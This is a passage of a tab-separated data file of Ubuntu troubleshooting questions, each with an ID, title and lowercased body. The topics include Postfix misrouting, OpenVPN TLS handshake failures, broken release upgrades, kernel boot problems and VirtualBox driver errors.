342322	can bash get out of sync with the filesystem ?	i may not be phrasing my question correctly , but i 'll do my best to explain the symptoms i 'm experiencing . first , for context , i 'm running an ubuntu server ( no gui ) , version 12.04.3 lts ( according the the lsb_release utility ) . i generally do all of my work in tmux , i connect to the server via putty , and i use vim for all my text editing . now for the symptoms . since i use tmux , i usually have a few windows open at all times . one of them houses a node server i 've been playing around with , and it lives in a subdirectory of my user account 's home ( specifically , ~/battleship ) . the server interacts with a webpage i 'm also hosting off of the server using nginx , and all the website code lives in /usr/share/nginx/www/bs ( i also keep a separate window open for editing the client source ) . what happens is that after several hours of leaving the server window idle and untouched , it seems to fall out of sync . i can run ls and see the files , and i can open them for editing ( vim server.js ) . when i do that , however , regardless of whether i make changes and save or just quit out instantly , when i run ls again i see a .server.js.swp file , and none of my changes ( if i made any ) persist . if i move out of that directory and then back in , it fixes itself - i can open the file and edit it successfully , without leaving behind a .swp when i close it . i mentioned the client source half of things because i 've noticed that this does n't happen in the /www folder ( presumably because it 's outside of my user account 's home directory ) . after that wall of text , my question is this : does anyone know why this is happening , and how to prevent it ? i can only imagine there 's some way , considering that this is n't the only linux server i connect to via putty and use tmux/vim on , and yet it 's the only one where this weird behavior happens . any help would be appreciated . note : i tagged this with bash , tmux , and putty because i 'm assuming one of them is to blame but i really have no clue which . update : this is the output of cat /proc/mount as requested by gilles ( albeit with my username and the values of ecryptfs_fnek_sig and ecryptfs_sig censored , because while i do n't actually know what those two things are , they seem encryption-related , and better safe than sorry ) . rootfs / rootfs rw 0 0 sysfs /sys sysfs rw , nosuid , nodev , noexec , relatime 0 0 proc /proc proc rw , nosuid , nodev , noexec , relatime 0 0 udev /dev devtmpfs rw , relatime , size=2008532k , nr_inodes=502133 , mode=755 0 0 devpts /dev/pts devpts rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 0 0 tmpfs /run tmpfs rw , nosuid , relatime , size=807840k , mode=755 0 0 /dev/disk/by-uuid/2da27263-f079-47ba-90ad-66e4c3a53810 / ext4 rw , relatime , errors=remount-ro , data=ordered 0 0 none /sys/fs/fuse/connections fusectl rw , relatime 0 0 none /sys/kernel/debug debugfs rw , relatime 0 0 none /sys/kernel/security securityfs rw , relatime 0 0 none /run/lock tmpfs rw , nosuid , nodev , noexec , relatime , size=5120k 0 0 none /run/shm tmpfs rw , nosuid , nodev , relatime 0 0 /home/ [ username ] /.private /home/ [ username ] ecryptfs rw , relatime , ecryptfs_fnek_sig= [ censored ] , ecryptfs_sig= [ censored ] , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs 0 0 update 2 : here 's the output of uname -a : linux [ server-name ] 3.5.0-39-generic # 60~precise1-ubuntu smp wed aug 14 15:38:41 utc 2013 x86_64 x86_64 x86_64 gnu/linux update 3 : i completed a pass of memtest . this is the result of said test . seems to have completed with no errors , so i 'm not sure if it will end up helping with anything . you can also see some hardware details in case that helps in any way .
342327	java oracle installation /usr/bin/java : can not execute binary file	hi i 've been trying for 1 day to get oracle java running on ubuntu . i have a powermac g5 with ubuntu 12.04 ppc64 . uname -a : linux lk37 3.2.0-53-powerpc64-smp # 81-ubuntu smp thu aug 22 21:17:14 utc 2013 ppc64 ppc64 ppc64 gnu/linux lspci : david @ lk37 : ~ $ sudo lspc [ sudo ] password for david : sudo : lspc : command not found david @ lk37 : ~ $ sudo lspci 0000:00:0b.0 pci bridge : apple inc. cpc945 pcie bridge 0000:0a:00.0 vga compatible controller : nvidia corporation nv43 [ geforce 6600 le ] ( rev a2 ) 0001:00:00.0 host bridge : apple inc. u4 ht bridge 0001:00:01.0 pci bridge : broadcom bcm5780 [ ht2000 ] pci-x bridge ( rev a3 ) 0001:00:02.0 pci bridge : broadcom bcm5780 [ ht2000 ] pci-x bridge ( rev a3 ) 0001:00:03.0 pci bridge : broadcom bcm5780 [ ht2000 ] pci-express bridge ( rev a3 ) 0001:00:04.0 pci bridge : broadcom bcm5780 [ ht2000 ] pci-express bridge ( rev a3 ) 0001:00:05.0 pci bridge : broadcom bcm5780 [ ht2000 ] pci-express bridge ( rev a3 ) 0001:00:06.0 pci bridge : broadcom bcm5780 [ ht2000 ] pci-express bridge ( rev a3 ) 0001:00:07.0 pci bridge : apple inc. shasta pci bridge 0001:00:08.0 pci bridge : apple inc. shasta pci bridge 0001:00:09.0 pci bridge : apple inc. shasta pci bridge 0001:01:07.0 unassigned class [ ff00 ] : apple inc. shasta mac i/o 0001:01:0b.0 usb controller : nec corporation ohci usb controller ( rev 43 ) 0001:01:0b.1 usb controller : nec corporation ohci usb controller ( rev 43 ) 0001:01:0b.2 usb controller : nec corporation upd72010x usb 2.0 controller ( rev 04 ) 0001:03:0c.0 ide interface : broadcom k2 sata 0001:03:0d.0 unassigned class [ ff00 ] : apple inc. shasta ide 0001:03:0e.0 firewire ( ieee 1394 ) : apple inc. shasta firewire 0001:05:04.0 ethernet controller : broadcom corporation netxtreme bcm5780 gigabit ethernet ( rev 03 ) 0001:05:04.1 ethernet controller : broadcom corporation netxtreme bcm5780 gigabit ethernet ( rev 03 ) david @ lk37 : ~ $ i tried various ways to install oracle java but i always end up with : bash : /usr/bin/java : can not execute binary file at the moment i have installed jdk-7u25-linux-x64.tar.gz in /usr/lib/jvm/jdk1.7.0/bin/ as said in this post i already tried the web install but i get a 404 error . i hope you can help me . i started using ubuntu yesterday so please give me the complete terminal code , it will be a lot easier for me . for those who care i want to play minecraft and with the openjdk i got a java.lang error . that 's why i want to install oracle java .
342328	how to upgrade natty/oneric server to precise ?	i started up with a pre-installed os having this sources.list file : deb http : //archive.ubuntu.com/ubuntu natty main deb http : //ro.archive.ubuntu.com/ubuntu/ oneiric universe deb-src http : //ro.archive.ubuntu.com/ubuntu/ oneiric universe deb http : //ro.archive.ubuntu.com/ubuntu/ oneiric-updates universe deb-src http : //ro.archive.ubuntu.com/ubuntu/ oneiric-updates universe and i 'm trying to upgrade it to this : # # # # # # ubuntu main repos deb http : //ro.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb-src http : //ro.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse # # # # # # ubuntu update repos deb http : //ro.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb http : //ro.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse deb-src http : //ro.archive.ubuntu.com/ubuntu/ precise-security main restricted universe multiverse deb-src http : //ro.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe multiverse but when i try to run apt-get upgrade it gives me this : root @ syrius : /etc/apt # apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc-dev-bin : depends : libc6 ( > 2.15 ) but 2.13-20ubuntu5.2 is installed libc6 : depends : libc-bin ( = 2.13-20ubuntu5.2 ) libc6-dev : depends : libc6 ( = 2.15-0ubuntu10.4 ) but 2.13-20ubuntu5.2 is installed libnih-dbus1 : depends : libnih1 ( = 1.0.3-4ubuntu9.1 ) but 1.0.3-4ubuntu2 is installed e : unmet dependencies . try using -f. and if i try running apt-get -f install , i get the following message : root @ syrius : /etc/apt # apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : nagios-images nagios3-core nagios3-cgi nagios3-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libc6 libnih1 suggested packages : glibc-doc the following packages will be upgraded : libc6 libnih1 2 upgraded , 0 newly installed , 0 to remove and 611 not upgraded . 4 not fully installed or removed . need to get 0 b/4708 kb of archives . after this operation , 58.4 kb of additional disk space will be used . do you want to continue [ y/n ] ? y locale : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.15 ' not found ( required by locale ) locale : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.14 ' not found ( required by locale ) debconf : dbdriver `` config '' : could not open /var/cache/debconf/config.dat ( reading database ... 121436 files and directories currently installed . ) preparing to replace libc6 2.13-20ubuntu5.2 ( using ... /libc6_2.15-0ubuntu10.4_amd64.deb ) ... locale : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.15 ' not found ( required by locale ) locale : /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.14 ' not found ( required by locale ) debconf : dbdriver `` config '' : could not open /var/cache/debconf/config.dat dpkg : error processing /var/cache/apt/archives/libc6_2.15-0ubuntu10.4_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 errors were encountered while processing : /var/cache/apt/archives/libc6_2.15-0ubuntu10.4_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i can not afford reinstalling the server from scratch . can anyone help me making it work ? thanks a lot in advance . sept. 8 update : root @ localhost : /etc/apt # cat /etc/debian_version wheezy/sid root @ localhost : /etc/apt # lsb_release -ac no lsb modules are available . distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric root @ localhost : /etc/apt # cat /etc/issue.net ubuntu 11.1 updated sources list back to deb http : //old-releases.ubuntu.com/ubuntu natty main deb http : //old-releases.ubuntu.com/ubuntu/ oneiric universe deb-src http : //old-releases.ubuntu.com/ubuntu/ oneiric universe deb http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates universe deb-src http : //old-releases.ubuntu.com/ubuntu/ oneiric-updates universe ran : http : //pastebin.com/3z2gz347 ( @ admins : i do not have reputation to post links = > apt-get update has links and even in tag they 're taken in consideration ) still ca n't get rid of this error . should i create the pinning file myself ?
342331	ubuntu hangs when memory is exceeded by large program	i have been using ubuntu to run computational simulations of materials . sometimes calculations overcome total memory available of machine , 64gb ram , and starts to use swap . when this happen ubuntu just stop and it is necessary to reboot . runing the same simulations with linux slackware it did not happen , instead of that , the simulations that have been stopped and i have an error in terminal , something like that : `` segmentation fault '' . is it possible to run the simulations in ubuntu and overcome the problem of ubuntu 's stops , like slackware ? thanks .
342334	postfix tries to connect to the domain instead of the hostname	i have posted this question on serverfault , but it 's as relevant to this site , so copying it here because i 'm desperate . i have several problems with my postfix configuration . let 's start by this one : in the postfix logs , postfix tries to connect ( smtp ) to example.org instead of mailer.example.org . example.org is another computer . note : i replaced below example.org by a domain i own . dns resolution for both example.org ( a computer running a web server ) and mailer.example.org ( the computer running postfix ) is correct . the test trying to send an email : ubuntu @ mailer : ~ $ telnet localhost 25 trying 127.0.0.1 ... connected to localhost . escape character is '^ ] ' . 220 mailer.example.org esmtp postfix ( ubuntu ) ehlo mailer.example.org 250-mailer.example.org 250-pipelining 250-size 10240000 250-vrfy 250-etrn 250-starttls 250-enhancedstatuscodes 250-8bitmime 250 dsn mail from : < root @ example.org > 250 2.1.0 ok rcpt to : < foo @ example.org > 250 2.1.5 ok data 354 end data with < cr > < lf > . < cr > < lf > asdfasdf . 250 2.0.0 ok : queued as 3ab5a41927 /var/log/mail.log : sep 6 20:10:15 mailer postfix/smtpd [ 2785 ] : connect from localhost [ 127.0.0.1 ] sep 6 20:10:23 mailer postfix/smtp [ 2779 ] : connect to example.org [ 54.229.20.238 ] :25 : connection timed out sep 6 20:10:23 mailer postfix/smtp [ 2779 ] : 253c641852 : to= < foo @ example.org > , relay=none , delay=1059 , delays=1029/0.02/30/0 , dsn=4.4.1 , status=deferred ( connect to example.org [ 54.229.20.238 ] :25 : connection timed out ) sep 6 20:10:40 mailer postfix/smtpd [ 2785 ] : 3ab5a41927 : client=localhost [ 127.0.0.1 ] sep 6 20:10:48 mailer postfix/cleanup [ 2789 ] : 3ab5a41927 : message-id= < 20130906201040.3ab5a41927 @ mailer.example.org > sep 6 20:10:48 mailer postfix/qmgr [ 2776 ] : 3ab5a41927 : from= < root @ example.org > , size=422 , nrcpt=1 ( queue active ) sep 6 20:10:50 mailer postfix/smtpd [ 2785 ] : disconnect from localhost [ 127.0.0.1 ] postconf -n : alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases append_dot_mydomain = no biff = no config_directory = /etc/postfix inet_interfaces = all local_recipient_maps = mailbox_size_limit = 0 mydestination = myhostname = mailer.example.org mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 myorigin = $ mydomain readme_directory = no recipient_delimiter = + relayhost = smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination smtpd_tls_cert_file = /etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file = /etc/ssl/private/ssl-cert-snakeoil.key smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtpd_use_tls = yes virtual_alias_maps = mysql : /etc/postfix/mysql_virtual_alias_maps.cf virtual_gid_maps = static:5000 virtual_mailbox_base = /mnt/vmail virtual_mailbox_domains = mysql : /etc/postfix/mysql_virtual_domains_maps.cf virtual_mailbox_limit = 51200000 virtual_mailbox_maps = mysql : /etc/postfix/mysql_virtual_mailbox_maps.cf virtual_minimum_uid = 5000 virtual_transport = virtual virtual_uid_maps = static:5000
342336	what is the maximum virtual memory available on ubuntu ( 32 and 64 bit )	i am working on a huge data set , i want to know how much virtual memory is available for 32 and 64 versions of ubuntu . thanks
342338	bluetooth mouse oklick 406s connects , but work as a battery level indicator , not mouse in ubuntu 13.04	$ upower -d device : /org/freedesktop/upower/devices/line_power_ac0 native-path : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/acpi0003:00/power_supply/ac0 power supply : yes updated : fri aug 16 02:32:44 2013 ( 315 seconds ago ) has history : no has statistics : no line-power online : yes device : /org/freedesktop/upower/devices/battery_bat0 native-path : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/pnp0c0a:00/power_supply/bat0 vendor : a25 model : a15 -- 22 power supply : yes updated : fri aug 16 02:32:49 2013 ( 310 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : fully-charged energy : 53.732 wh energy-empty : 0 wh energy-full : 53.732 wh energy-full-design : 60.2 wh energy-rate : 0 w voltage : 16.676 v percentage : 100 % capacity : 89.2558 % technology : lithium-ion device : /org/freedesktop/upower/devices/battery_hid_30o03o01o25o02o2f_battery native-path : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0/bluetooth/hci0/hci0:22/0005:056e:0061.0004/power_supply/hid-30:03:01:25:02:2f-battery model : laser btmouse power supply : no updated : fri aug 16 02:37:49 2013 ( 10 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : discharging energy : 0 wh energy-empty : 0 wh energy-full : 0 wh energy-full-design : 0 wh energy-rate : 0 w percentage : 100 % capacity : 100 % daemon : daemon-version : 0.9.20 can-suspend : yes can-hibernate : no on-battery : no on-low-battery : no lid-is-closed : no lid-is-present : yes is-docked : no i have the battery indicator of my oklick bluetooth mouse ( model 406s ) in place of my laptop battery indicator . and the mouse is not working as a pointing device ... now i use another bluetooth mouse - a4-tech bt-630 - without problems ... and without additional forward/backward buttons : - ) how can i correct this behaviour ? how to see the laptop battery 's status ? how to use my mouse as a mouse ( pointing device ) ?
342341	after kernel update , stuck on purple screen but old kernel still works	as the title says , the new kernel does n't work . i am on ubuntu 12.10 . i had 3.0.39 or something like that , and when i updated to 3.0.40 , it just gave me a purple screen . however , with grub customizer , i set my default boot entry to the old kernel and it works fine . so my questions are : how can i get my new kernel to work ? and if not , how can i delete the new kernel and make ubuntu just boot to the old kernel ? and is it safe to remove the new kernel ? thanks
342343	can not boot back into chromeos from chrubuntu acer c710-2847	i have chrubuntu installed on my acer c710-2847 . sudo cgpt add -i 6 -p 0 -s 1 /dev/sda does n't let me boot into chromeos . the machine will continue the chrubuntu boot ... what do i do ? i do n't want to keep exiting developer mode , just a hassle to have stuff get deleted , etc .
342347	i 've installed ubuntu from windows 7 and i picked my 500gb sata drive . i do n't see where it 's made the partition	like the title says , i 'm not sure where this 19gb drive that ubuntu is running on lives . i 'm somewhat worried that it might have used my system drive . how do i find this out ? i checked in disc utility but did not see anything to point me in the right direction . does it no longer use a partition ?
342355	tun : error fetching interface information : device not found	i am new to openvpn and tried the step through tutorial at https : //help.ubuntu.com/lts/serverguide/openvpn.html . i have set up the server without hassle . i have got stuck with the client though . i get to start the vpn client with : /etc/init.d/openvpn start * starting virtual private network daemon ( s ) ... * autostarting vpn 'client ' [ ok ] as soon as i check if it has created an interface with : ifconfig tun i get : tun : error fetching interface information : device not found i am using ubuntu 12.04 and openvpn 2.2.1 . i have tried searching for solutions on various forums with loads of dead ends . upon restaring the client with : sudo /etc/init.d/openvpn restart the result of syslog following the following command : grep -i vpn /var/log/syslog is : > sep 7 15:34:06 mylaptop [ 4205 ] : verify error : depth=1error=self signed certificate in certificate chain : /c=uk/st=berks/l=reading/o=malaprade-vpn/ou=changeme/cn=changeme/name=changeme/emailaddress=myemail @ myemail.com > sep 7 15:34:06 mylaptop [ 4205 ] : tls_error : bio read tls_read_plaintext error : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed > sep 7 15:34:06 mylaptop [ 4205 ] : tls error : tls object - > incoming plaintext read error > sep 7 15:34:06 mylaptop [ 4205 ] : tls error : tls handshake failed > sep 7 15:34:06 mylaptop [ 4205 ] : tcp/udp : closing socket > sep 7 15:34:06 mylaptop [ 4205 ] : sigusr1 [ soft , tls-error ] receivedprocess restarting > sep 7 15:34:06 mylaptop [ 4205 ] : restart pause2 second ( s ) > sep 7 15:34:08 mylaptop [ 4205 ] : note : the current -- script-security setting may allow this configuration to call user-defined scripts > sep 7 15:34:08 mylaptop [ 4205 ] : re-using ssl/tls context > sep 7 15:34:08 mylaptop [ 4205 ] : lzo compression initialized > sep 7 15:34:08 mylaptop [ 4205 ] : control channel mtu parms [ l:1542 d:138 ef:38 eb:0 et:0 el:0 ] > sep 7 15:34:08 mylaptop [ 4205 ] : socket buffers : r= [ 212992- > 131072 ] s= [ 212992- > 131072 ] > sep 7 15:34:08 mylaptop [ 4205 ] : data channel mtu parms [ l:1542 d:1450 ef:42 eb:135 et:0 el:0 af:3/1 ] > sep 7 15:34:08 mylaptop [ 4205 ] : local options hash ( ver=v4 ) : '41690919' > sep 7 15:34:08 mylaptop [ 4205 ] : expected remote options hash ( ver=v4 ) : '530fdded' > sep 7 15:34:08 mylaptop [ 4205 ] : udpv4 link local : [ undef ] > sep 7 15:34:08 mylaptop [ 4205 ] : udpv4 link remote : [ af_inet ] 81.99.246 ... .:1194 > sep 7 15:34:08 mylaptop [ 4205 ] : tls : initial packet from [ af_inet ] 81.99.246 ... .:1194sid=d33c4bcd 13855f2a > sep 7 15:34:08 mylaptop [ 4205 ] : verify error : depth=1error=self signed certificate in certificate chain : /c=uk/st=berks/l=reading/o=malaprade-vpn/ou=changeme/cn=changeme/name=changeme/emailaddress=myemail @ myemail.com > sep 7 15:34:08 mylaptop [ 4205 ] : tls_error : bio read tls_read_plaintext error : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed > sep 7 15:34:08 mylaptop [ 4205 ] : tls error : tls object - > incoming plaintext read error > sep 7 15:34:08 mylaptop [ 4205 ] : tls error : tls handshake failed > sep 7 15:34:08 mylaptop [ 4205 ] : tcp/udp : closing socket > sep 7 15:34:08 mylaptop [ 4205 ] : sigusr1 [ soft , tls-error ] receivedprocess restarting > sep 7 15:34:08 mylaptop [ 4205 ] : restart pause2 second ( s ) > sep 7 15:34:10 mylaptop [ 4205 ] : note : the current -- script-security setting may allow this configuration to call user-defined scripts > sep 7 15:34:10 mylaptop [ 4205 ] : re-using ssl/tls context > sep 7 15:34:10 mylaptop [ 4205 ] : lzo compression initialized > sep 7 15:34:10 mylaptop [ 4205 ] : control channel mtu parms [ l:1542 d:138 ef:38 eb:0 et:0 el:0 ] > sep 7 15:34:10 mylaptop [ 4205 ] : socket buffers : r= [ 212992- > 131072 ] s= [ 212992- > 131072 ] > sep 7 15:34:10 mylaptop [ 4205 ] : data channel mtu parms [ l:1542 d:1450 ef:42 eb:135 et:0 el:0 af:3/1 ] > sep 7 15:34:10 mylaptop [ 4205 ] : local options hash ( ver=v4 ) : '41690919' > sep 7 15:34:10 mylaptop [ 4205 ] : expected remote options hash ( ver=v4 ) : '530fdded' > sep 7 15:34:10 mylaptop [ 4205 ] : udpv4 link local : [ undef ] > sep 7 15:34:10 mylaptop [ 4205 ] : udpv4 link remote : [ af_inet ] 81.99.246 ... .:1194 > sep 7 15:34:10 mylaptop [ 4205 ] : tls : initial packet from [ af_inet ] 81.99.246 ... .:1194sid=3aeeea4b 5bcdad48 > sep 7 15:34:14 mylaptop [ 4205 ] : verify error : depth=1error=self signed certificate in certificate chain : /c=uk/st=berks/l=reading/o=malaprade-vpn/ou=changeme/cn=changeme/name=changeme/emailaddress=myemail @ myemail.com > sep 7 15:34:14 mylaptop [ 4205 ] : tls_error : bio read tls_read_plaintext error : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed > sep 7 15:34:14 mylaptop [ 4205 ] : tls error : tls object - > incoming plaintext read error > sep 7 15:34:14 mylaptop [ 4205 ] : tls error : tls handshake failed > sep 7 15:34:14 mylaptop [ 4205 ] : tcp/udp : closing socket > sep 7 15:34:14 mylaptop [ 4205 ] : sigusr1 [ soft , tls-error ] receivedprocess restarting > sep 7 15:34:14 mylaptop [ 4205 ] : restart pause2 second ( s ) > sep 7 15:34:16 mylaptop [ 4205 ] : note : the current -- script-security setting may allow this configuration to call user-defined scripts > sep 7 15:34:16 mylaptop [ 4205 ] : re-using ssl/tls context > sep 7 15:34:16 mylaptop [ 4205 ] : lzo compression initialized > sep 7 15:34:16 mylaptop [ 4205 ] : control channel mtu parms [ l:1542 d:138 ef:38 eb:0 et:0 el:0 ] > sep 7 15:34:16 mylaptop [ 4205 ] : socket buffers : r= [ 212992- > 131072 ] s= [ 212992- > 131072 ] > sep 7 15:34:16 mylaptop [ 4205 ] : data channel mtu parms [ l:1542 d:1450 ef:42 eb:135 et:0 el:0 af:3/1 ] > sep 7 15:34:16 mylaptop [ 4205 ] : local options hash ( ver=v4 ) : '41690919' > sep 7 15:34:16 mylaptop [ 4205 ] : expected remote options hash ( ver=v4 ) : '530fdded' > sep 7 15:34:16 mylaptop [ 4205 ] : udpv4 link local : [ undef ] > sep 7 15:34:16 mylaptop [ 4205 ] : udpv4 link remote : [ af_inet ] 81.99.246 ... .:1194 > sep 7 15:34:16 mylaptop [ 4205 ] : tls : initial packet from [ af_inet ] 81.99.246 ... .:1194sid=7b448d09 bc912fc9 > sep 7 15:34:18 mylaptop [ 4205 ] : verify error : depth=1error=self signed certificate in certificate chain : /c=uk/st=berks/l=reading/o=malaprade-vpn/ou=changeme/cn=changeme/name=changeme/emailaddress=myemail @ myemail.com > sep 7 15:34:18 mylaptop [ 4205 ] : tls_error : bio read tls_read_plaintext error : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed > sep 7 15:34:18 mylaptop [ 4205 ] : tls error : tls object - > incoming plaintext read error > sep 7 15:34:18 mylaptop [ 4205 ] : tls error : tls handshake failed > sep 7 15:34:18 mylaptop [ 4205 ] : tcp/udp : closing socket > sep 7 15:34:18 mylaptop [ 4205 ] : sigusr1 [ soft , tls-error ] receivedprocess restarting > sep 7 15:34:18 mylaptop [ 4205 ] : restart pause2 second ( s ) > sep 7 15:34:18 mylaptop [ 4205 ] : sigterm [ hard , init_instance ] receivedprocess exiting > sep 7 15:34:19 mylaptop [ 4281 ] : openvpn 2.2.1 x86_64-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on feb 27 2013 > sep 7 15:34:19 mylaptop [ 4281 ] : note : the current -- script-security setting may allow this configuration to call user-defined scripts > sep 7 15:34:19 mylaptop [ 4281 ] : warning : file 'malaprade-laptop.key ' is group or others accessible > sep 7 15:34:19 mylaptop [ 4281 ] : lzo compression initialized > sep 7 15:34:19 mylaptop [ 4281 ] : control channel mtu parms [ l:1542 d:138 ef:38 eb:0 et:0 el:0 ] > sep 7 15:34:19 mylaptop [ 4281 ] : socket buffers : r= [ 212992- > 131072 ] s= [ 212992- > 131072 ] > sep 7 15:34:19 mylaptop [ 4281 ] : data channel mtu parms [ l:1542 d:1450 ef:42 eb:135 et:0 el:0 af:3/1 ] > sep 7 15:34:19 mylaptop [ 4281 ] : local options hash ( ver=v4 ) : '41690919' > sep 7 15:34:19 mylaptop [ 4281 ] : expected remote options hash ( ver=v4 ) : '530fdded' > sep 7 15:34:19 mylaptop [ 4282 ] : udpv4 link local : [ undef ] > sep 7 15:34:19 mylaptop [ 4282 ] : udpv4 link remote : [ af_inet ] 81.99.246 ... .:1194 > sep 7 15:34:19 mylaptop [ 4282 ] : tls : initial packet from [ af_inet ] 81.99.246 ... .:1194sid=9aebce78 68063f68 > sep 7 15:34:19 mylaptop [ 4282 ] : verify error : depth=1error=self signed certificate in certificate chain : /c=uk/st=berks/l=reading/o=malaprade-vpn/ou=changeme/cn=changeme/name=changeme/emailaddress=myemail @ myemail.com > sep 7 15:34:19 mylaptop [ 4282 ] : tls_error : bio read tls_read_plaintext error : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed > sep 7 15:34:19 mylaptop [ 4282 ] : tls error : tls object - > incoming plaintext read error > sep 7 15:34:19 mylaptop [ 4282 ] : tls error : tls handshake failed > sep 7 15:34:19 mylaptop [ 4282 ] : tcp/udp : closing socket > sep 7 15:34:19 mylaptop [ 4282 ] : sigusr1 [ soft , tls-error ] receivedprocess restarting > sep 7 15:34:19 mylaptop [ 4282 ] : restart pause2 second ( s ) > sep 7 15:34:21 mylaptop [ 4282 ] : note : the current -- script-security setting may allow this configuration to call user-defined scripts > sep 7 15:34:21 mylaptop [ 4282 ] : re-using ssl/tls context > sep 7 15:34:21 mylaptop [ 4282 ] : lzo compression initialized > sep 7 15:34:21 mylaptop [ 4282 ] : control channel mtu parms [ l:1542 d:138 ef:38 eb:0 et:0 el:0 ] > sep 7 15:34:21 mylaptop [ 4282 ] : socket buffers : r= [ 212992- > 131072 ] s= [ 212992- > 131072 ] > sep 7 15:34:21 mylaptop [ 4282 ] : data channel mtu parms [ l:1542 d:1450 ef:42 eb:135 et:0 el:0 af:3/1 ] > sep 7 15:34:21 mylaptop [ 4282 ] : local options hash ( ver=v4 ) : '41690919' > sep 7 15:34:21 mylaptop [ 4282 ] : expected remote options hash ( ver=v4 ) : '530fdded' > sep 7 15:34:21 mylaptop [ 4282 ] : udpv4 link local : [ undef ] > sep 7 15:34:21 mylaptop [ 4282 ] : udpv4 link remote : [ af_inet ] 81.99.246 ... .:1194 > sep 7 15:34:21 mylaptop [ 4282 ] : tls : initial packet from [ af_inet ] 81.99.246 ... .:1194sid=9627f3ba 1890da0f > sep 7 15:34:21 mylaptop [ 4282 ] : verify error : depth=1error=self signed certificate in certificate chain : /c=uk/st=berks/l=reading/o=malaprade-vpn/ou=changeme/cn=changeme/name=changeme/emailaddress=myemail @ myemail.com > sep 7 15:34:21 mylaptop [ 4282 ] : tls_error : bio read tls_read_plaintext error : error:14090086 : ssl routines : ssl3_get_server_certificate : certificate verify failed > sep 7 15:34:21 mylaptop [ 4282 ] : tls error : tls object - > incoming plaintext read error > sep 7 15:34:21 mylaptop [ 4282 ] : tls error : tls handshake failed > sep 7 15:34:21 mylaptop [ 4282 ] : tcp/udp : closing socket > sep 7 15:34:21 mylaptop [ 4282 ] : sigusr1 [ soft , tls-error ] receivedprocess restarting > sep 7 15:34:21 mylaptop [ 4282 ] : restart pause2 second ( s )
342357	how to change the notifications dialog theme ?	after installing gnome 3 on my ubuntu 13.04 ( unity ) the `` notification dialog theme '' ( screenshot below ) changed . i 'd like to know if is possible to return to the unity default notification dialog theme without needing to uninstall gnome 3 . thanks in advance .
342359	ubuntu 13.04 returns to login screen when logging in & update problems	in an attempt to fix the problem , i uninstalled lightdm and gdm is now the default . but i experience the same problem with gdm . when i try to reinstall lighten , i receive : warning : the following packages can not be authenticated ! lightdm install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ raring-updatea/main lighten amd64 1.6.0-ubuntu3 something wicked happen ed resolving 'us.archive.ubuntu.com : http ' ( -11 - system error ) failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/1/lightdm_1.6.0-0ubuntu3_amd64.deb so me thing wicked happened resolving 'us.archive.ubuntu.com : http ' ( -11 - system error ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix missing ?
342360	raring update gives saucy packages	when i try to update my system , instead of getting raring packages , i 'm getting saucy packages . i did recurrently try to upgrade to the saucy alpha but cancelled half way though . does anyone know how to fix this ?
342365	what is the difference between grubx64 and shimx64 ?	i 'm new to linux . i loaded ubuntu on my mac and i 'm booting it with refind . i see two choices : efi\ubuntu\grubx64.efi efi\ubuntu\shimx64.efi they both boot into ubuntu . what 's the difference between the two and which one should i use ? did i do something wrong that made both show up ?
342370	virtualbox stopped working in 12.04 lts after i upgraded kernel using hardware enablement stack	i 'm on ubuntu 12.04 ( precise ) with kernel 3.8 now . virtualbox fails with this error : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . users of ubuntu , fedora or mandriva should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . one proposed solution i saw was : sudo apt-get remove virtualbox-dkms sudo apt-get install virtualbox-dkms that fails with this message : sudo apt-get install virtualbox-dkms reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : virtualbox-dkms 0 upgraded , 1 newly installed , 0 to remove and 34 not upgraded . need to get 676 kb of archives . after this operation , 3,899 